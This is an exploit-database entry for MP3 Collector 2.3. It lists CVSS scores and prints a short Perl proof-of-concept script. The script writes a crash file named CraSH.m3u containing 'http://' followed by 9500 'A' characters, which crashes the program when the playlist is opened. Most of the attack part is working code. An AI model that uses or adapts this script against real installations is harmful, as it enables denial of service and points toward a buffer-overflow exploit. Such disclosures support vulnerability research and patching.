MP3 Collector 2.3 (m3u File) Local Crash PoC

2009-09-30 / 2009-10-01
Credit: zAx
Risk: Low
Local: No
Remote: Yes


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/perl # MP3 Collector 2.3 (m3u File) Local Crash PoC # By : zAx # Application Homepage : http://collectorz.com # Application Download : http://downloads.collectorz.com/mp3collectorsetup.exe # Go to Playlist menu, select Open Playlist, Select the File and a click on file name. $header = "http://"; $crash = "\x41" x 9500; # Just a Random size . my $file = "CraSH.m3u"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $header.$crash; close($FILE); print "Done \n";

References:

http://www.milw0rm.com/exploits/9689


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top